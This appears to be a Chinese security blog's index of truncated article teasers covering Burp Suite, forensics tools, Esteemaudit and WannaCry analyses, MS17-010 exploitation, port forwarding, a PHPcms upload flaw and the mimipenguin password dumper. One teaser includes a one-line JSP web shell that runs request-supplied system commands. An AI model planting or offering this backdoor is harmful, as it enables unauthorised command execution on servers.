解决Burp Suite 抓取部分https数据包失败的解决方法 Burp Suite作为一个渗透测试利器,在平时的工作和学习中经常使用到,通过设置代理的方式抓取通讯中的数据包,在使用中抓取http协议的通讯效果还是比较...
22款受欢迎的计算机取证工具
计算机取证是与计算机和网络犯罪有关的,一门非常重要的计算机学科分支。在早前,计算机只用于生成数据,但现在已扩展到与数字数据相关的所有设备。计算机取证的目标是通过使用数字资料的证据来进行犯罪调查,以...
CentOS6安装chrome浏览器问题
之前Google就说了,由于CentOS/RHEL 6已经是过期的系统,所以不再会有Chrome了。 虽然后来由于引起了社区的抗议,从而改口,不再提CentOS/RHEL 6是过期系统了;但是,目前在CentOS/RHEL 6上已经没有Chrome可以下...
NSA武器库Esteemaudit技术解析
一、导语 继2017年5月12号肆虐全球的WannaCry勒索病毒攻击后,安全专家向正在使用Windows XP和Windows Server 2003的用户发出了安全警告,提防利用名为“Esteemaudit”的黑客工具进行的第二波网络攻击。“Esteemaud...
MS17-010漏洞检测与内网穿透技术的应用
0x00 前言 本文主要介绍一下MSF模块的下载、使用,以及当攻击机处于内网,而目标机也处于内网的解决方法。这里借助MS17-010漏洞来具体讲解一下,并没有新的知识点,可以为刚入门的新手抛砖引玉,提供一条解决问...
WannaCry蠕虫详细分析
背景: 2017年5月12日,WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密,本文对其进行详细分析。 木马概况: Wa...
jsp小后门
一:执行系统命令:无回显执行系统命令: 1 <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后...
linux下内网端口转发工具:linux版lcx 使用方法
这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上。但这个工具同样适用于运维工程师进行远程内网维护。 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I...
PHPcms9.6.0 任意文件上传漏洞
phpcms9.6.0新版出现文件上传漏洞 对于PHPcms9.6.0 最新版漏洞,具体利用步骤如下: 首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行) 在根目录下新建一个txt文本文件里面...
Linux下密码抓取神器mimipenguin
前有Mimikatz,今有mimipenguin,近日国外安全研究员huntergregal发布了工具mimipenguin,一款Linux下的密码抓取神器,可以说弥补了Linux下密码抓取的空缺。 项目地址 https://github.com/huntergregal/mimipen...